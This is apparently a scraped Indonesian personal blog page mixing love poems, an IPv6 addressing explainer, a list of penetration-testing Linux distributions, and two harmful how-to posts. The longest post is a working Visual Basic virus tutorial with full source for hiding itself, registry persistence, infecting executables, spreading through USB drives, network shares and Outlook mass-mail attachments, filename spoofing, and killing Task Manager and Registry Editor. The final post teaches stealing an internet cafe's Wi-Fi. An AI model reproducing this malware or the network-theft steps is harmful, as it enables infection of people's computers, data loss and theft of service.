Sadarlah

Kulihat kau dari tempat berbeda
Rasa cintaku mengalir tiada henti
Dari dunia menuju tempat terindah
Dari hati menuju hati yang suci

Air mata hanya sebagai jawaban
Dari kesedihan yang datangi indahnya hari
Secepat inikah takdir kehidupan?
Apa mungkin Tuhan terlalu peduli?

Memang ku tak bisa mengubah hidup
Ku juga tak bisa halangi kematian
Sadarlah ku sayang kau
Sadarlah ku cinta kau
Demi apapun yang kan di pertaruhkan

Ku peluk kau dengan cara berbeda
Rasa rinduku besar tak terkendali
Dari dunia menuju surga
Dari sanubari menuju hati yang suci

Memang kau tak bisa mengubah hidup
Kau juga tak bisa halangi kematian
Sadarlah kau ku sayang
Sadarlah kau ku cinta
Demi apapun yang kan di pertaruhkan

(Dedicated to My Friend’s Brother, Alm. Muammar Qhadafi)
~Tanzi Al-Fisah~

Puisi ini bersumber dari : http://www.gudangpuisi.com/2011/12/sadarlah.html#ixzz1gKvwWLLz
Blogger yang beretika selalu menampilkan sumbernya.
di Tidak ada komentar:

MAKIN CINTA

akan kumulai darimana lagi
tuk ungkapkan cinta untukmu
pujangga pun angkat tangan sudah
tinggalkan penanya dikertas putihku

langit pun tersungging saja
melukis cinta di matanya
andai pelangi turun di sini
kujadikan pita perekat hatiku

ada cinta untukmu
mungkin tak seindah syair
tak seharum mawar
namun ada cinta untukmu
yang datang dengan apadanya
namun jadi diraja merajai waktu

LOVE YOU SO MUCH HASIANq
(B’ SiManullang)
 
to someone loved me

Puisi ini bersumber dari : http://www.gudangpuisi.com/2011/02/makin-cinta.html#ixzz1gKt2wvUZ
Blogger yang beretika selalu menampilkan sumbernya.
di Tidak ada komentar:

Alamat IP versi 6

Dari Wikipedia bahasa Indonesia, ensiklopedia bebas
 
Alamat IP versi 6 (sering disebut sebagai alamat IPv6) adalah sebuah jenis pengalamatan jaringan yang digunakan di dalam protokol jaringan TCP/IP yang menggunakan protokol IP versi 6. Panjang totalnya adalah 128-bit, dan secara teoritis dapat mengalamati hingga 2128=3,4 x 1038 host komputer di seluruh dunia. Contoh alamat IP versi 6 adalah 21DA:00D3:0000:2F3B:02AA:00FF:FE28:9C5A.

Format Alamat

Dalam IPv6, alamat 128-bit akan dibagi ke dalam 8 blok berukuran 16-bit, yang dapat dikonversikan ke dalam bilangan heksadesimal berukuran 4-digit. Setiap blok bilangan heksadesimal tersebut akan dipisahkan dengan tanda titik dua (:). Karenanya, format notasi yang digunakan oleh IPv6 juga sering disebut dengan colon-hexadecimal format, berbeda dengan IPv4 yang menggunakan dotted-decimal format.
Berikut ini adalah contoh alamat IPv6 dalam bentuk bilangan biner:

0010000111011010000000001101001100000000000000000010111100111011000000101010101
0000000001111111111111110001010001001110001011010
Untuk menerjemahkannya ke dalam bentuk notasi colon-hexadecimal format, angka-angka biner di atas harus dibagi ke dalam 8 buah blok berukuran 16-bit:




0010000111011010 0000000011010011 0000000000000000 0010111100111011 
0000001010101010 0000000011111111 1111111000101000 1001110001011010
Lalu, setiap blok berukuran 16-bit tersebut harus dikonversikan ke  dalam bilangan heksadesimal dan setiap bilangan heksadesimal tersebut  dipisahkan dengan menggunakan tanda titik dua. Hasil konversinya adalah  sebagai berikut:




21DA:00D3:0000:2F3B:02AA:00FF:FE28:9C5A
 
Jenis-jenis Alamat IPv6
IPv6 mendukung beberapa jenis format prefix, yakni sebagai berikut:


  • Alamat Unicast, yang menyediakan komunikasi secara point-to-point, secara langsung antara dua host dalam sebuah jaringan.
    • 

  • Alamat Multicast, yang menyediakan metode untuk mengirimkan sebuah paket data ke banyak host yang berada dalam group yang sama. Alamat ini digunakan dalam komunikasi one-to-many.
    • 

  • Alamat Anycast,  yang menyediakan metode penyampaian paket data kepada anggota terdekat  dari sebuah group. Alamat ini digunakan dalam komunikasi one-to-one-of-many. Alamat ini juga digunakan hanya sebagai alamat tujuan (destination address) dan diberikan hanya kepada router, bukan kepada host-host biasa.
    • 

Jika dilihat dari cakupan alamatnya, alamat unicast dan anycast terbagi menjadi alamat-alamat berikut:


  • Link-Local, merupakan sebuah jenis alamat yang mengizinkan sebuah komputer agar dapat berkomunikasi dengan komputer lainnya dalam satu subnet.
    • 

  • Site-Local, merupakan sebuah jenis alamat yang mengizinkan sebuah komputer agar dapat berkomunikasi dengan komputer lainnya dalam sebuah intranet.
    • 

  • Global Address, merupakan sebuah jenis alamat yang mengizinkan sebuah komputer agar dapat berkomunikasi dengan komputer lainnya dalam Internet berbasis IPv6.
    • 

Sementara itu, cakupan alamat multicast dimasukkan ke dalam struktur alamat.

  

Multicast Address



Alamat multicast IPv6 sama seperti halnya alamat multicast  pada IPv4. Paket-paket yang ditujukan ke sebuah alamat multicast akan  disampaikan terhadap semua interface yang dikenali oleh alamat tersebut.  Prefiks alamat yang digunakan oleh alamat multicast IPv6 adalah FF00::/8.




 Field Panjang Keterangan 


 11111111 8 bit Tanda pengenal bahwa alamat ini adalah alamat multicast. 


 Flags 4 bit Berfungsi sebagai tanda pengenal apakah alamat ini adalah alamat  transient atau bukan. Jika nilainya 0, maka alamat ini bukan alamat  transient, dan alamat ini merujuk kepada alamat multicast yang  ditetapkan secara permanen. Jika nilainya 1, maka alamat ini adalah  alamat transient. 


 Scope 4 bit Berfungsi untuk mengindikasikan cakupan lalu lintas multicast, seperti halnya interface-local, link-local, site-local, organization-local atau global. 


 Group ID 112 bit Berfungsi sebagai tanda pengenal group multicast











di




Tidak ada komentar:
              





























Beberapa Distro untuk Hacking











Pada kesempatan kali  ini saya akan sedikit berbagi tentang  Distro Linux yang paling  banyak  digunakan untuk hacking atau penetrasi test jaringan (pentest).

Penetrasi jaringan adalah proses yang dilakukan oleh seseorang   (pentester) untuk masuk ke jaringan atau komputer dengan cara mencari   celah keamanan (vulnerability) dalam sistem.



Pentesting sangat diperlukan untuk meminimalisasi celah keamanan  yang  ada. Dengan begitu seseorang yang tidak punya hak tidak akan mudah  masuk  ke sistem.



Yang jelas pentest itu intinya mencari celah keamanan dalam sistem untuk   selanjutnya melakukan perbaikan (patch) terhadap celah tersebut.



Mungin sebagaian dari kawan-kawan sudah banyak yang mencoba dari   beberapa distro linux ini. Salah satu yang paling terkenal adalah   backtrack. Tapi ternyata masih banyak distro lain yang menarik untuk   dicoba jika ingin melakukan penetrasi network. 



1. BACKTRACK
Backtrack  merupakan salah satu distro linux untuk penetrasi dan audit  yang  paling banyak digunakan saat ini di seluruh dunia. Backtrack  awalnya  adalah Whoppix, IWHAX, and Auditor kemudian di gabungkan menjadi  satu  live linux cd dimana terintegrasi lebih dari 300 security tools   didalamnya. Tak Heran Backtrack 4 pre release di download lebih dari 4   juta. Versi terakhir backtrack 5 di release 10 mei 2011.



2. Samurai Web Testing Framework



Buat  yang  biasa dengan Web Testing tak salah untuk menggunakan ini. Distro   linux ini memang di khususkan untuk web testing. Didalamnya terdapat   banyak open source tool pilihan untuk web testing. Seperti dikutif di   official webnya, Web testing framework menyediakan tool-tool untuk web   test dalam 4 tahap.

Dimulai dengan tahap reconnaissance, distro ini menyediakan tool semacam   fierce domain scanner dan maltego. Untuk mapping tersedia tool semacam   WebScarab dan ratproxy. tahap Discovery bisa menggunakan tool w3af dan   burp. Dan terakhir exploitasi tersedia tool BeEF, AJAXShell dan  lainya.  versi terakhirnya adalah samurai-0.9.9.



 
3. NetSecL



NetSecL  adalah Distro linux berbasis OpenSuse Untuk penetrasi jaringan   Computer desktop maupun server. Versi terakhir NetsecL 3.2 dengan fitur   XFCE memberikan performance yang handal, compatibility dengan OpenSuse   11.4 dan kernel 2.6.32.8. Bagi agan yang biasa dengan lingkungan   OpenSuse NetSecl bisa menjadi pilihan untuk melakukan pentest system.



4. The Live Hacking DVD





Live  DVd hacking adalah distro linux baru dengan base Ubuntu yang berisi   tool-tool untuk ethical hacking, pentest, dan countermeasure.   Didalamnya terdapat tool-tool untuk DNS, reconnaissance, foot-printing   (mengumpulkan informasi komputer target), password kracking, network   sniffing, spoofing dan wireless utilities. Untuk daftar list tool yang   tersedia didalamnya bisa langsung chek di official webnya, and disini   juga banyak free tutorial dan demo video.



5. Blackbuntu





Distro  Linux ini sesuai namanya berbasis ubuntu dengan GNOME Desktop   Environtment Di buat terutama untuk security training students dan   praktisi security jaringan. Built di ubuntuk versi 10.10 dan salah satu   distro untuk penetrasi mirip Backtrack. Versi terakhir CE 0.2



6. SANS Investigate Forensic Toolkit (SIFT) Workstation





Yang  tertarik di Dunia Forensic komputer. International team of forensic   expert Sans Faculty telah membuat distro linux yang di khusunya untuk   bidang ini. Distro linux ini telah di release ke public dan bisa   digunakan oleh setiap orang yang tertarik untuk 'menangkap intruder' .  Tookit yang disediakan sudah sesuai dengan perkembangan modern forensic  tool. Mungkin Distro ini untuk advance user kayaknya tapi jika ingin  mencobanya bisa baca terlebih dahulu official webnya.



7. Operator

Satu lagi Distro turunan Debian untuk penestrasi jaringan. Distro yang   mirip dengan knoppix yang bootable dari cd dan running di RAM ini   dilengkapi juga dengan forensic dan recovery tool.

Operator berisi banyak open source network security tool untuk penetrasi   computer dan server agan. langsung saja check out webnya dan download.





Thank's to ermayu.blogspot.com karena sudah mau membagikan artikelnya








di




Tidak ada komentar:
              























          

        

          

        

          

        







Teknik Pembuatan Virus Komputer











  


Syarat sebuah virus computer :
  1. Menyembunyikan      prosesnya dari pemakai
    2. 

  2. Mengaktifkan      dirinya setiap startup sistem
    3. 

  3. Menyebarkan      dirinya melalui media file executable
    4. 

  4. Mempercepat      proses penyebarannya melalui media pertukaran data dan informasi
    5. 

  5. Mempercepat      penyebarannya dengan memanfaatkan kelemahan dari suatu system
    6. 

  6. Menyebarkan      dirinya dengan filename spoofing.
    7. 

  7. Mempercepat      proses penyebarannya dengan pendekatan social engineering
    8. 

  8. Berusaha      mempertahankan existensi dirinya
    9. 




Tanpa menggunakan teori yang panjang dan lebar, kita akan membahas bagaimana hal tersebut diatas dapat dilakukan dengan menggunakan bahasa pemrograman Visual Basic.



Menyembunyikan prosesnya dari pemakai



Agar program tidak menampilkan dirinya pada Task Bar, dapat digunakan perintah :



App.TaskVisible = False



Kemudian untuk menyembunyikan form dapat menggunakan :



Me.Visible = False



Mengaktifkan dirinya setiap startup sistem



Agar program exe dapat diaktifkan setiap kali startup system, kita dapat menduplikasi program ke suatu folder dengan perintah :



FileCopy app.Path & "\" & app.EXEName , environ$("windir") & "\" & app.EXEName



dan menambah ke registry :



Dim WShell as Object
Set WShell = CreateObject("WScript.Shell")
WShell.regwrite “HKLM\Software\Microsoft\Windows\CurrentVersion\Run\virusku", environ$("windir") & "\" & app.EXEName
Set WShell = Nothing
Menyebarkan dirinya melalui media file executable



Program virus harus dapat menginfeksi program-program executable dengan proses sebagai berikut :



Program Executable



Setelah terinfeksi oleh program virus menjadi :



Program Virus + Program Executable + Ukuran Virus + Signature Virus



Sehingga setiap kali program yang telah terinfeksi dijalankan, maka Program Virus akan menginstalasi dirinya ke computer korban dan mengembalikan proses ke Program Executable.



Jadi pada saat program terinfeksi dijalankan, maka Program Executable harus di pulihkan kembali dengan melakukan perhitungan :



Posisi Program Executable = Ukuran File – Ukuran Virus – Ukuran Signature Virus



Sesuatu hal yang harus diperhatikan adalah infeksi terhadap Program Executable tidak boleh dilakukan berulang-ulang dan tidak boleh menginfeksi diri Program Virus sendiri, sehingga harus ditambahkan suatu Signature Virus



Private Sub PeriksadanInfeksiExe(fname As String)
Dim tSignature As String * 5
Dim OriginalCode As String
Dim fNum As Integer
'Jangan menginfeksi diri sendiri
'Hanya menginfeksi file berukuran lebih dibawah 1 Mega
If Dir(fname) <> "" Then
   If FileLen&(fname) > virSize And FileLen&(fname) < 1048576 Then
      'Ambil nomor file
      fNum = FreeFile
      Open fname For Binary Access Read As fNum 'Buka file target
      Seek fNum, LOF(fNum) - 5 + 1         'pindah file pointer ke posisi Signature Virus
      tSignature = Space$(5)
      Get fNum, , tSignature                        'baca tSignature
      Close fNum
      If tSignature <> virSignature Then     'jika file virus (tidak ada virSignature)
         On Error GoTo finally
            Open fname For Binary Access Read Write As fNum 'Buka file target
            OriginalCode = Space$(LOF(fNum))
            Get fNum, , OriginalCode            'baca Program Executable
            Put fNum, 1, virCode                   'tulis Program Virus diawal
            Put fNum, , OriginalCode            'tulis Program Executable
            Put fNum, , virSize                      'tulis Ukuran Virus
            Put fNum, , virSignature             'tulis Signature Virus
            Close fNum
finally:
      End If
   End If
End If
End Sub



Ketika program Executable dijalankan maka :



Private Sub VirusInitial()
Dim OriginalCode As String
Dim tSignature As String * 5
Dim fNum As Integer
Dim fname As String



virSignature = Chr$(3) + Chr$(53) + Chr$(103) + Chr$(153) + Chr$(203)



Open exePath + App.EXEName + ".exe" For Binary Access Read As #1
Seek #1, LOF(1) - 5 + 1                 'pindah file pointer ke posisi virSize
tSignature = Space$(5)
Get #1, , tSignature                        'baca virSignature



If tSignature <> virSignature Then   'Jika file virus sendiri
   virSize = LOF(1)                            'ukuran virSize sama dengan ukuran file
   virCode = Space$(virSize)             'siapkan buffer virCode
   Seek #1, 1                                       'ke posisi bof
   Get #1, , virCode                            'baca virCode sebesar ukuran virSize
   Close #1
   
   Call VirInstall                                 'instalasi virus
   
   If Not SudahLoad Then
      Load ff                                         'aktifkan timer virus
   End If
   
'Jika file yang terinfeksi
Else
   Seek #1, LOF(1) - 9 + 1                 'pindah file pointer ke posisi virSize
   Get #1, , virSize                             'baca virSize (long = 4 byte)
   'Baca vircode
   virCode = Space$(virSize)             
   Seek #1, 1                                       'ke posisi BOF (Awal file)
   Get #1, , virCode                            'baca virCode sebesar ukuran virSize
   
   OriginalCode = Space$(LOF(1) - virSize)            'siapkan buffer
   Get #1, , OriginalCode                                           'baca originalCode
   
   fNum = 0
   Do While Dir(exePath & App.EXEName & fNum & ".exe") <> ""
      fNum = fNum + 1
   Loop
   
   fname = exePath & App.EXEName & fNum & ".exe"



   On Error GoTo finally
      Open fname For Binary Access Write As #2
      Put #2, , OriginalCode                                      'tulis ke file sementara
      Close #2                                                            'tutup file sementara
finally:
  
   Close #1
   
   Call VirInstall
   
   If Not SudahLoad Then
      Load ff                                          'aktifkan timer virus
   End If



   Call ExecuteOriginal(fname)
   Kill fname                                        'hapus file sementara
End If
End Sub



Private Sub ExecuteOriginal(fname)
Dim Host As Long, HProc As Long, HExit As Long
Host = Shell(fname, vbNormalFocus)                 'jalankan fname
HProc = OpenProcess(PROCESS_ALL_ACCESS, False, Host)
GetExitCodeProcess HProc, HExit                     'ambil status aktif
Do While HExit = STILL_ACTIVE                   'proses ditahan selama proses masih aktif
   DoEvents                                                          'lakukan event yang lain
   GetExitCodeProcess HProc, HExit
Loop
End Sub



Private Function SudahLoad() As Boolean
Dim vir_hwnd As Long
'Jika Jendela virus aktif
vir_hwnd = FindWindow(vbNullString, titleSudahLoad)
SudahLoad = Not (vir_hwnd = 0)
End Function
Mempercepat proses penyebarannya melalui media pertukaran data dan informasi



Menyebarkan dirinya ke Floppy Disk, diaktifkan dengan suatu timer. Program ini bekerja dengan senantiasa memantau terhadap keaktifkan jendela 3½ Floppy (A:) oleh pemakai.



Public Sub InfeksiFloppy()
On Error GoTo BatalInfeksi
Dim floppy_hwnd As Long
Dim fname As String
'Jika Jendela Floppy terbuka
floppy_hwnd = FindWindow(vbNullString, "3½ Floppy (A:)")
If Not floppy_hwnd = 0 Then
   Call InfeksiResource("A:", "DOCXLS") 'Hanya infeksi Doc, Exe jangan
End If
BatalInfeksi:
End Sub



Menyebarkan dirinya ke Flash Disk, diaktifkan dengan suatu timer. Program ini bekerja dengan senantiasa memantau removable drive diatas drive C.



Public Sub InfeksiFlashDisk()
On Error GoTo BatalInfeksi
Dim ObjFSO As Object
Dim ObjDrive As Object
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
For Each ObjDrive In ObjFSO.Drives
    'Asumsi semua removable drive diatas huruf C adalah flash disk
    '1 - Removable drive
    '2 - Fixed drive (hard disk)
    '3 - Mapped network drive
    '4 - CD-ROM drive
    '5 - RAM disk
    If ObjDrive.DriveType = 1 And ObjDrive.DriveLetter > "C" Then
       Call InfeksiResource(ObjDrive.DriveLetter + ":", "XLSDOC")
    End If
Next
BatalInfeksi:
End Sub



Menyebarkan dirinya ke semua resource yang di Share pada computer yang terinfeksi :



Public Sub InfeksiMySharing()
Dim shares() As String, share As Variant, target As String
If GetShares("\\127.0.0.1", "Microsoft Windows Network", shares) = True Then
   For Each share In shares
       target = share
       Call InfeksiResource(target, "XLSDOCEXE")
   Next share
End If
End Sub



Menyebarkan dirinya ke semua resource share yang terbuka di LAN, dengan mengambil semua Domain maupun Workgroup dan menyimpannya dalam suatu stack.



Public Sub AmbilDomain()
Dim Domains() As String, Domain As Variant
If GetShares("", "Microsoft Windows Network", Domains) = True Then
   For Each Domain In Domains
       If Not stackDomain.isFull Then
          stackDomain.Push (Domain)
       End If
   Next Domain
End If
End Sub



Kemudian mengambil computer yang berada pada masing-masing Domain maupun Workgroup dalam suatu stack.



Public Sub AmbilComputer()
Dim Computers() As String, Domain As String, Computer As Variant
If Not stackDomain.isEmpty() Then
   Domain = stackDomain.Pop()
   If GetShares(Domain, "Microsoft Windows Network", Computers) = True Then
      For Each Computer In Computers
          If Not stackComputer.isFull Then
             stackComputer.Push (Computer)
          End If
      Next Computer
   End If
End If
End Sub



Dan Akhirnya mengambil semua resource yang dishare dari masing-masing Computer :



Public Sub AmbilDrive()
Dim Drives() As String, Computer As String, Drive As Variant
If Not stackComputer.isEmpty() Then
   Computer = stackComputer.Pop()
   If GetShares(Computer, "Microsoft Windows Network", Drives) = True Then
      For Each Drive In Drives
          If Not stackDrive.isFull Then
             stackDrive.Push (Drive)
          End If
      Next Drive
   End If
End If
End Sub



Public Sub InfeksiNetworkDrive()
Dim target As String
If Not stackDrive.isEmpty() Then
   target = stackDrive.Pop()
   Call InfeksiResource(target, "XLSDOCEXE")
End If
End Sub
Melakukan penyebaran melalui fasilitas email :



Public Sub SpreadEmailOutlook()
Dim Outlook As Object
Dim Mapi As Object
Dim Mail As Object
Dim AddressBook As Variant
Dim MailAddress As Variant
Dim i As Integer, j As Integer



On Error GoTo finally
Set Outlook = CreateObject("Outlook.Application")
   Set Mapi = Outlook.GetNamespace("MAPI")
      
   For i = 1 To Mapi.AddressLists.Count
       Set AddressBook = Mapi.AddressLists(i)
       For j = 1 To AddressBook.AddressEntries.Count
           MailAddress = AddressBook.AddressEntries(j)
        
           Set Mail = Outlook.CreateItem(0)
   
           Mail.Recipients.Add (MailAddress)
           Mail.Subject = "Subject Virus Anda"
           Mail.Body = vbCrLf & "Pesan anda agar pemakai tertarik membuka attachment."
           Mail.Attachments.Add Environ$("windir") & "\" & attachment & ".doc.exe"
           Mail.Send
       Next
   Next
  
finally:
   Set Outlook = Nothing
   Set Mapi = Nothing
End Sub



Mempercepat penyebarannya dengan memanfaatkan kelemahan dari suatu system



Penulis tidak akan membahas tentang teknik yang satu ini. Pada dasarnya cara kerjanya adalah seperti ini, misalnya pada Windows yang otomatis menjalankan file dengan script extension tertentu (Contoh teknik virus Redlof), sehingga program virus dapat membuat script tersebut untuk mentrigger program virus.



Ada juga worms yang memanfaatkan kelemahan Outlook Express, dimana secara otomatis menjalankan Attachment tanpa klik dari pemakai.



Ada juga worms yang menyebarkan diri melalui website, dimana jika anda mengunjungi suatu website dengan software browser yang memiliki kelemahan, maka secara otomatis browser mendownload kode yang tidak diinginkan dan menjalankannya.



Ada juga worms yang menyebar melalui media Bluetooth yang dalam keadaan terbuka.



Menyebarkan dirinya dengan filename spoofing.



Teknik filename spoofing banyak digunakan oleh worms dewasa ini dengan menggunakan double extension :



Misalnya :



SuratCinta.doc.pif



Pada system yang settingnya tidak menampilkan extension file maka file tersebut diatas ditampilkan pada system sebagai :



SuratCinta.doc



Mempercepat proses penyebarannya dengan pendekatan social engineering.



Teknik ini adalah gampang-gampang sudah, tetapi sangat mempengaruhi penyebaran dan siklus hidup virus anda. Social engineering banyak digunakan oleh hacker-hacker untuk memperdaya dengan pendekatan non-teknis computer, tetapi lebih cenderung kepada pendekatan manusia.



Banyak virus menyebar dengan memanfaatkan kesenangan orang akan materi-materi pornografi, yaitu dengan membuat membuat nama-nama file, maupun pesan email yang memancing korban untuk penasaran membuka attachment.



Ada juga virus yang disebarkan pada game-game maupun crack software yang menumpang pada program tersebut.



Berusaha mempertahankan existensi dirinya



Mencoba mematikan proses-proses program yang berpotensi untuk menghentikan proses virus, maupun tools yang dapat menghapus proses virus tersebut :



WShell.regwrite “HKCU\ \Software\Microsoft\Windows\CurrentVersionPolicies\System\DisableRegistryTools", 0, "REG_DWORD"
WShell.regwrite “HKCU\ \Software\Microsoft\Windows\CurrentVersionPolicies\System\DisableCMD", 0, "REG_DWORD"



Maupun melacak jendela proses-proses musuh, dan menutupnya.



Public Sub KillEnemy()
Dim EnemyProcess(20) As String
Dim i As Integer
EnemyProcess(1) = "Registry Editor"
EnemyProcess(2) = "Windows Task Manager"
EnemyProcess(3) = "Process Viewer"
EnemyProcess(4) = "Open With"
For i = 1 To 4 Step 1
    Call KillEnemyWindow(EnemyProcess(i))
Next i
End Sub



Private Sub KillEnemyWindow(target As String)
Dim Enemy_hwnd As Long
Enemy_hwnd = FindWindow(vbNullString, target)
If Not Enemy_hwnd = 0 Then
   CloseWindow (Enemy_hwnd)
End If
End Sub



Kesimpulan :



Pemrograman virus sangat membutuhkan pengetahuan tentang bagaimana proses-proses system operasi yang berpotensi digunakan sebagai sarana penyebaran, serta perintah-perintah pemrograman yang dapat digunakan untuk mewujudkan proses tersebut. Jadi tidak diperlukan algoritma yang rumit, sehingga dapat dengan mudah dilakukan oleh programmer-programmer pemula.



Keberhasilan menerapkan teknik social engineering akan menentukan kesuksesan dan siklus hidup virus anda.



Lampiran A



‘API  Declaration Modul



Option Explicit



Public Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Public Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Public Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long
Public Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Public Declare Function CloseWindow Lib "user32" (ByVal hwnd As Long) As Long



Public Const STILL_ACTIVE As Long = &H103
Public Const PROCESS_ALL_ACCESS As Long = &H1F0FFF



Public Type NETRESOURCE
   dwScope As Long
   dwType As Long
   dwDisplayType As Long
   dwUsage As Long
   lpLocalName As Long
   lpRemoteName As Long
   lpComment As Long
   lpProvider As Long
End Type



Public Declare Function WNetOpenEnum Lib "mpr.dll" Alias "WNetOpenEnumA" _
   (ByVal dwScope As Long, ByVal dwType As Long, ByVal dwUsage As Long, _
   lpNetResource As NETRESOURCE, lphEnum As Long) As Long
Public Declare Function WNetEnumResource Lib "mpr.dll" Alias "WNetEnumResourceA" _
   (ByVal hEnum As Long, lpcCount As Long, lpBuffer As NETRESOURCE, lpBufferSize As Long) As Long
Public Declare Function WNetCloseEnum Lib "mpr.dll" (ByVal hEnum As Long) As Long
Public Declare Function lstrlen Lib "kernel32" Alias "lstrlenA" (ByVal pString As Long) As Long
Public Declare Function lstrcpy Lib "kernel32" Alias "lstrcpyA" _
   (ByVal lpString1 As String, ByVal pString As Long) As Long
   
Const RESOURCE_GLOBALNET = 2
Const RESOURCETYPE_DISK = 1
Const RESOURCEDISPLAYTYPE_DOMAIN = 0
Const RESOURCEUSAGE_CONTAINER = 1



Function GetShares(ByVal RemoteName As String, ByVal Provider As String, sShares() As String) As Boolean
   Dim hEnum As Long, nrLen As Long, nrCount As Long
   Dim nr(2048) As NETRESOURCE, retval As Boolean
   nrCount = -1
   nrLen = 65536
   RemoteName = StrConv(RemoteName, vbFromUnicode)
   nr(0).lpRemoteName = StrPtr(RemoteName)
   Provider = StrConv(Provider, vbFromUnicode)
   nr(0).lpProvider = StrPtr(Provider)
   nr(0).dwType = RESOURCEDISPLAYTYPE_DOMAIN
   nr(0).dwUsage = RESOURCEUSAGE_CONTAINER
   If WNetOpenEnum(RESOURCE_GLOBALNET, RESOURCETYPE_DISK, 0, nr(0), hEnum) = 0 Then
      If WNetEnumResource(hEnum, nrCount, nr(0), nrLen) = 0 Then
         If nrCount > 0 Then
            ReDim sShares(nrCount - 1) As String
            For nrLen = 0 To (nrCount - 1)
               sShares(nrLen) = Space(lstrlen(nr(nrLen).lpRemoteName))
               Call lstrcpy(sShares(nrLen), nr(nrLen).lpRemoteName)
            Next nrLen
            retval = True
         End If
      End If
      Call WNetCloseEnum(hEnum)
   End If
   GetShares = retval
End Function



Lampiran B



‘Form ff



Option Explicit
Dim SedangInfeksi As Boolean
Dim SpreadEmail As Boolean
Dim Aktifitas As Integer       '0 = floppy, 1 = flashdisk
Dim Loncat As Integer



Private Sub AT_Timer()
Call KillEnemy
If Not SedangInfeksi Then    ‘jangan overlapping proses
   SedangInfeksi = True
   If Aktifitas = 0 Then
      Call InfeksiMySharing
   ElseIf Aktifitas = 1 Then
      Call AmbilDomain
   ElseIf Aktifitas = 2 Then
      Call AmbilComputer
   ElseIf Aktifitas = 3 Then
      Call AmbilDrive
   ElseIf Aktifitas = 4 Then
      Call InfeksiNetworkDrive
   ElseIf Aktifitas = 5 Then
      Call InfeksiFloppy
   ElseIf Aktifitas = 6 Then
      'Call InfeksiFlashDisk
   ElseIf Aktifitas = 7 Then
      Call InfeksiMySharing
   ElseIf Aktifitas = 8 Then
      If Not SpreadEmail Then
         Call SpreadEmailOutlook
         SpreadEmail = True
      End If
      Aktifitas = 1
   End If
   Aktifitas = (Aktifitas + 1)
   SedangInfeksi = False
End If
End Sub



Main Program
Private Sub Form_Load()
Me.Visible = False
Me.Caption = titleSudahLoad
AT.Interval = 1000
SedangInfeksi = False
SpreadEmail = False
Aktifitas = 0
Loncat = 0
AT.Enabled = True
End Sub









di




Tidak ada komentar:
              























          

        

          

        

          

        







Cara Internet Gratis di WARNET











Hallo semua....
jumpa lagi sama saya moch ciku-ciku cinta(di fb) kali ini saya akan membahas suatu trik yang mungkin udah banyak di ketahui orang lain...
ini trik curi internet dari warnet..
OK langsung saja tanpa ada basa basi..



Hal yang perlu dipersiapkan...
1. Laptop lengkap settingan WIFI
2. nyali dan kemauan belajar
 3. Target harus memakai modem ADSL dengan fitur wireless



OK kita mulai ya..



ini contoh modem yang saya bicarakan..
tuch dia contoh nya


ini "belkin adsl modem" dilengkapi fitur wireless mode
lihat saja ada antena nya



TUTORIAL:
1. kamu datang ke warnet dengan wajah tanpa dosa.
2. usahakan main sebentar jika "nothing money" ini dilewatkan
3. catat DNS yang ada diwarnet itu.
3. buka laptop anda dan nyalakan wireless nya
4. pasti akan terdeteksi wireless dari modem tersebut
5. koneksikan dan konfigurasi IP dan DNSnya secara manual



CONTOH



1. IP 192.168.1.1 gateway
    IP 192.168.1.255 broadcast
    DNS server 1 203.123.243.150
    DNS server 2 202.134.0.134



2. berarti konfigurasi IP-mu dari 192.168.1.2 - 192.168.1.254 terserah mau yang mana
3. lihat hasil nya ada akan mendapatkan hak akses secara gratis..



NB:
1. usahakan berada jauh dari operator.
2. Resiko diluar tanggung jawab saya. :)
3. Jangan lupa follow dan komentarnya












di




Tidak ada komentar:
              























        

      









Langganan:
Postingan (Atom)